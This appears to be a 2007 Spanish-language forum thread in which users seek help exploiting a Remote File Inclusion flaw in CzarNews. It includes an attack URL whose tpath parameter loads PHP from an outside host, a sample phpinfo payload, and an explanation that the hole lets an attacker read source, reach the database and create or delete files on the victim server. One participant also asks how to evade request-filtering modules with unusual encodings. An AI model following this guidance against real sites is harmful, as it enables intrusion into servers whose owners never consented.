[?] File include

Iniciado por Rienzi, 20 Agosto 2007, 13:53 PM

0 Miembros y 1 Visitante están viendo este tema.

Rienzi

Saludos!! me gustaría comprender el funcionamiento del siguiente Exploit!!

http://www.securityfocus.com/bid/12857/exploit

Que debería hacer?¿? crear un archivo config en mi host y de ahí enlazarlo de la siguiente manera?

http://www.victima.com/research/news/CzarNewsv113b/headlines.php?tpath=http://www.host.org/cn_config.php

También me gustaría saber si con esa vulnerabilidad podría cambiar el index o modificarlo un saludo.

yeikos

Se supone que www.victima.com es el servidor vulnerable al Remote File Inclusion y no tú.

PD: Date una vuelta por Google.


Rienzi

pero que tipo de shell debería utilizar? conocen algún tutorial en Español para poder saber mas sobre esta vulnerabilidad ? Que podría hacer con ella??? ya e buscado por google y me aparecen vulns de otros tipos y una pila de cosas en árabe de todas formas probare esta tarde jejeje gracias por vuestra ayuda!!

yeikos

En http://www.example.org/cn_config.php se debe de encontrar el codigo PHP que se ejecutará en la página vulnerable, por ejemplo:

Código (php) [Seleccionar]
<?php
echo "<?php phpinfo(); ?>
";
?>


En caso de que el archivo sea un documento de texto bastará con escribirlo sin más:

Código (php) [Seleccionar]
<?php phpinfo(); ?>

Rienzi

y una vez con el Exploit listo que utilidad puedo darle?? modificar la configuracion de la web???

yeikos

Ejecutar cualquier código PHP en el servidor, o lo que es lo mismo, leer el código fuente de los archivos, poder establecer una conexión con la base de datos, crear/editar/eliminar archivos, etcétera.

Distorsion

Aprovecho este post para preguntar una duda. Segun que paginas tienen modulos de seguridad como el php nuke que filtran las peticiones. He probado a ponerlo en ehadecimal en la url el RFI pero lo pilla igual es algo que se tiene en cuenta, la codificacion de caracteres. Sabeis alguna manera de saltarse el filtrado o alguna codificacion poco conocida y no implementada en los modulos de seguridad?¿
Saludos

Rienzi

ah ok muchisimas gracias , la shell deberia estar en php no? conoces de alguna ya hecha para que me haga mas o menos una idea de como seria la indicada para explotarla?¿